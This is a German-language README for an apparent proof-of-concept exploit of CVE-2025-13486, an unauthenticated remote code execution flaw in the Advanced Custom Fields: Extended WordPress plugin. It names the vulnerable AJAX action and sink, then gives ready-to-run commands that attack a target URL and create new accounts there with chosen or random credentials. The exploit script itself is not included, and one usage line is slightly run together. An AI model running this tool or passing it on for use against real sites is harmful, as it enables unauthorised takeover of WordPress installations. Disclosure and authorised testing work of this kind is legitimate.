
POC für CVE-2025-13486
Ein Proof-of-Concept (PoC) Exploit für CVE-2025-13486, eine Remote Code Execution Schwachstelle im Advanced Custom Fields: Extended (ACFE) WordPress-Plugin.
Diese Schwachstelle existiert in ACFE Versionen 0.9.0.5 bis 0.9.1.1 und ermöglicht es nicht authentifizierten Angreifern, beliebige PHP-Funktionen über die AJAX-Aktion acfe/form/render_form_ajax auszuführen. Das Plugin verwendet call_user_func_array() mit benutzergesteuerten Eingaben ohne ordnungsgemäße Validierung.
print_r (nicht destruktiv)pip install requests
python poc.py -u http://target-site.com --verify
# Mit zufälligen Anmeldedaten (werden nach der Ausführung angezeigt)
python poc.py -u http://target-site.com
# Mit benutzerdefinierten Anmeldedaten
python poc.py -u http://target-site.com --user admin123 --password P@ssw0rd! --email [email protected]
-u, --url Ziel-URL der WordPress-Seite (erforderlich)
--verify Nur Schwachstelle überprüfen (sicherer, verwendet print_r)
--user Zu erstellender Benutzername (Standard: zufällig)
--password Zu setzendes Passwort (Standard: zufällig)
--email Zu setzende E-Mail-Adresse (Standard: zufällig)
Dieser PoC dient ausschließlich zu Bildungs- und autorisierten Sicherheitstestzwecken. Unautorisierter Zugriff auf Computersysteme ist illegal. Holen Sie vor Tests stets die entsprechende Genehmigung ein.